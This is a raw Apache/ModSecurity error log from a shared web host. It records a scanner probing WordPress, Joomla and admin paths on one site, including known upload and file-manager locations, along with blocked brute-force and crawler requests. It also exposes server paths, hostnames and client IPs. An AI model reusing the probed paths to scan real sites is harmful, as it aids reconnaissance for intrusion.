[Tue May 26 17:06:21.692839 2026] [security2:error] [pid 851641:tid 851871] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/sitemaps/"] [unique_id "ahWFtRp8QSN2510avp46SQAAAGQ"]
[Tue May 26 17:06:21.906101 2026] [autoindex:error] [pid 851641:tid 851774] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:21.906758 2026] [security2:error] [pid 851641:tid 851774] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtRp8QSN2510avp46VAAAAAM"]
[Tue May 26 17:06:21.907095 2026] [security2:error] [pid 851641:tid 851848] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/sodium_compat/"] [unique_id "ahWFtRp8QSN2510avp46UgAAAE0"]
[Tue May 26 17:06:21.925967 2026] [security2:error] [pid 851641:tid 851792] [client 149.20.243.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFtRp8QSN2510avp46UQAAABU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 17:06:22.196760 2026] [core:error] [pid 851641:tid 851834] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:06:22.196790 2026] [core:error] [pid 851641:tid 851834] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:06:22.301109 2026] [core:error] [pid 851641:tid 851876] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:06:22.301134 2026] [core:error] [pid 851641:tid 851876] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:06:22.383181 2026] [autoindex:error] [pid 851641:tid 851829] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/style-engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:22.383836 2026] [security2:error] [pid 851641:tid 851829] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFthp8QSN2510avp46cgAAADo"]
[Tue May 26 17:06:22.384226 2026] [security2:error] [pid 851641:tid 851898] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/style-engine/"] [unique_id "ahWFthp8QSN2510avp46bwAAAH8"]
[Tue May 26 17:06:22.668478 2026] [security2:error] [pid 851641:tid 851867] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFthp8QSN2510avp46agAAAGA"]
[Tue May 26 17:06:22.815803 2026] [autoindex:error] [pid 851641:tid 851840] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:22.816472 2026] [security2:error] [pid 851641:tid 851840] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFthp8QSN2510avp46gQAAAEU"]
[Tue May 26 17:06:22.816838 2026] [security2:error] [pid 851641:tid 851801] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/theme-compat/"] [unique_id "ahWFthp8QSN2510avp46fwAAAB4"]
[Tue May 26 17:06:23.010963 2026] [autoindex:error] [pid 851641:tid 851779] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:23.011649 2026] [security2:error] [pid 851641:tid 851779] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFthp8QSN2510avp46hgAAAAg"]
[Tue May 26 17:06:23.012037 2026] [security2:error] [pid 851641:tid 851787] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/widgets/"] [unique_id "ahWFthp8QSN2510avp46hAAAABA"]
[Tue May 26 17:06:23.454217 2026] [security2:error] [pid 851641:tid 851794] [client 203.194.101.7:51826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFtxp8QSN2510avp46lgAAABc"]
[Tue May 26 17:06:23.454389 2026] [security2:error] [pid 851641:tid 851794] [client 203.194.101.7:51826] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFtxp8QSN2510avp46lgAAABc"]
[Tue May 26 17:06:23.542040 2026] [autoindex:error] [pid 851641:tid 851891] [client 89.117.104.11:48000] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:23.542790 2026] [security2:error] [pid 851641:tid 851891] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtxp8QSN2510avp46lwAAAHg"]
[Tue May 26 17:06:23.823516 2026] [autoindex:error] [pid 851641:tid 851825] [client 89.117.104.11:48000] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:23.824320 2026] [security2:error] [pid 851641:tid 851825] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtxp8QSN2510avp46oQAAADY"]
[Tue May 26 17:06:24.011394 2026] [security2:error] [pid 851641:tid 851813] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFtxp8QSN2510avp46mgAAACo"]
[Tue May 26 17:06:24.124322 2026] [security2:error] [pid 851641:tid 851829] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuBp8QSN2510avp46pAAAADo"]
[Tue May 26 17:06:24.124351 2026] [security2:error] [pid 851641:tid 851829] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuBp8QSN2510avp46pAAAADo"]
[Tue May 26 17:06:24.129417 2026] [security2:error] [pid 851641:tid 851815] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/admin/images/slider/"] [unique_id "ahWFuBp8QSN2510avp46ogAAACw"]
[Tue May 26 17:06:24.523561 2026] [security2:error] [pid 851641:tid 851862] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuBp8QSN2510avp46qgAAAFs"]
[Tue May 26 17:06:24.523591 2026] [security2:error] [pid 851641:tid 851862] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuBp8QSN2510avp46qgAAAFs"]
[Tue May 26 17:06:24.524255 2026] [security2:error] [pid 851641:tid 851886] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/admin/fckeditor/editor/filemanager/"] [unique_id "ahWFuBp8QSN2510avp46qAAAAHM"]
[Tue May 26 17:06:25.181147 2026] [security2:error] [pid 851641:tid 851823] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp46uQAAADQ"]
[Tue May 26 17:06:25.181175 2026] [security2:error] [pid 851641:tid 851823] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp46uQAAADQ"]
[Tue May 26 17:06:25.181891 2026] [security2:error] [pid 851641:tid 851831] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/sites/default/files/"] [unique_id "ahWFuRp8QSN2510avp46twAAADw"]
[Tue May 26 17:06:25.497518 2026] [security2:error] [pid 851641:tid 851895] [client 92.222.108.123:48008] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "thegoodsporting.com"] [uri "/robots.txt"] [unique_id "ahWFuRp8QSN2510avp46wgAAAHw"]
[Tue May 26 17:06:25.497681 2026] [security2:error] [pid 851641:tid 851895] [client 92.222.108.123:48008] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "thegoodsporting.com"] [uri "/robots.txt"] [unique_id "ahWFuRp8QSN2510avp46wgAAAHw"]
[Tue May 26 17:06:25.638925 2026] [security2:error] [pid 851641:tid 851821] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp46xwAAADI"]
[Tue May 26 17:06:25.638966 2026] [security2:error] [pid 851641:tid 851821] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp46xwAAADI"]
[Tue May 26 17:06:25.642765 2026] [security2:error] [pid 851641:tid 851806] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/admin/controller/extension/extension/"] [unique_id "ahWFuRp8QSN2510avp46xQAAACM"]
[Tue May 26 17:06:25.931637 2026] [security2:error] [pid 851641:tid 851864] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp46zQAAAF0"]
[Tue May 26 17:06:25.931663 2026] [security2:error] [pid 851641:tid 851864] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp46zQAAAF0"]
[Tue May 26 17:06:25.932226 2026] [security2:error] [pid 851641:tid 851773] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/modules/mod_simplefileuploadv1.3/elements/"] [unique_id "ahWFuRp8QSN2510avp46ywAAAAI"]
[Tue May 26 17:06:26.314505 2026] [security2:error] [pid 851641:tid 851887] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuhp8QSN2510avp464QAAAHQ"]
[Tue May 26 17:06:26.314535 2026] [security2:error] [pid 851641:tid 851887] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuhp8QSN2510avp464QAAAHQ"]
[Tue May 26 17:06:26.315333 2026] [security2:error] [pid 851641:tid 851796] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/components/"] [unique_id "ahWFuhp8QSN2510avp463wAAABk"]
[Tue May 26 17:06:26.316133 2026] [security2:error] [pid 851641:tid 851800] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFuRp8QSN2510avp460wAAAB0"]
[Tue May 26 17:06:26.653133 2026] [security2:error] [pid 851641:tid 851880] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuhp8QSN2510avp465wAAAG0"]
[Tue May 26 17:06:26.653164 2026] [security2:error] [pid 851641:tid 851880] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuhp8QSN2510avp465wAAAG0"]
[Tue May 26 17:06:26.653869 2026] [security2:error] [pid 851641:tid 851813] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/admin/uploads/images/"] [unique_id "ahWFuhp8QSN2510avp465QAAACo"]
[Tue May 26 17:06:27.056218 2026] [security2:error] [pid 851641:tid 851804] [client 54.39.6.75:53306] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "thegoodsporting.com"] [uri "/"] [unique_id "ahWFuxp8QSN2510avp469wAAACE"]
[Tue May 26 17:06:27.056334 2026] [security2:error] [pid 851641:tid 851804] [client 54.39.6.75:53306] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "thegoodsporting.com"] [uri "/"] [unique_id "ahWFuxp8QSN2510avp469wAAACE"]
[Tue May 26 17:06:27.348921 2026] [security2:error] [pid 851641:tid 851883] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuxp8QSN2510avp46_QAAAHA"]
[Tue May 26 17:06:27.348948 2026] [security2:error] [pid 851641:tid 851883] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFuxp8QSN2510avp46_QAAAHA"]
[Tue May 26 17:06:27.364114 2026] [security2:error] [pid 851641:tid 851824] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/classic-editor/"] [unique_id "ahWFuxp8QSN2510avp46-QAAADU"]
[Tue May 26 17:06:27.501548 2026] [security2:error] [pid 851641:tid 851797] [client 114.119.129.113:65033] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/s.w.org"] [unique_id "ahWFuxp8QSN2510avp47BQAAABo"], referer: https://moes-art.com//s.w.org
[Tue May 26 17:06:27.603636 2026] [autoindex:error] [pid 851641:tid 851801] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-content/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:27.604354 2026] [security2:error] [pid 851641:tid 851801] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFuxp8QSN2510avp47CQAAAB4"]
[Tue May 26 17:06:27.604749 2026] [security2:error] [pid 851641:tid 851873] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-content/fonts/"] [unique_id "ahWFuxp8QSN2510avp47BwAAAGY"]
[Tue May 26 17:06:27.772019 2026] [security2:error] [pid 851641:tid 851697] [remote 209.42.18.223:41208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWFuxp8QSN2510avp47DAAACjc"]
[Tue May 26 17:06:28.417998 2026] [security2:error] [pid 851641:tid 851792] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvBp8QSN2510avp47IAAAABU"]
[Tue May 26 17:06:28.418031 2026] [security2:error] [pid 851641:tid 851792] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvBp8QSN2510avp47IAAAABU"]
[Tue May 26 17:06:28.418756 2026] [security2:error] [pid 851641:tid 851828] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/contact-form-7/admin/js/"] [unique_id "ahWFvBp8QSN2510avp47HgAAADk"]
[Tue May 26 17:06:28.696390 2026] [autoindex:error] [pid 851641:tid 851896] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-content/plugins/contact-form-7/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:28.697052 2026] [security2:error] [pid 851641:tid 851896] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFvBp8QSN2510avp47LwAAAH0"]
[Tue May 26 17:06:28.711705 2026] [security2:error] [pid 851641:tid 851882] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/contact-form-7/"] [unique_id "ahWFvBp8QSN2510avp47LQAAAG8"]
[Tue May 26 17:06:28.957939 2026] [security2:error] [pid 851641:tid 851818] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvBp8QSN2510avp47NwAAAC8"]
[Tue May 26 17:06:28.957969 2026] [security2:error] [pid 851641:tid 851818] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFvBp8QSN2510avp47NwAAAC8"]
[Tue May 26 17:06:28.958614 2026] [security2:error] [pid 851641:tid 851863] [client 89.117.104.11:40088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wordpress/"] [unique_id "ahWFvBp8QSN2510avp47NQAAAFw"]
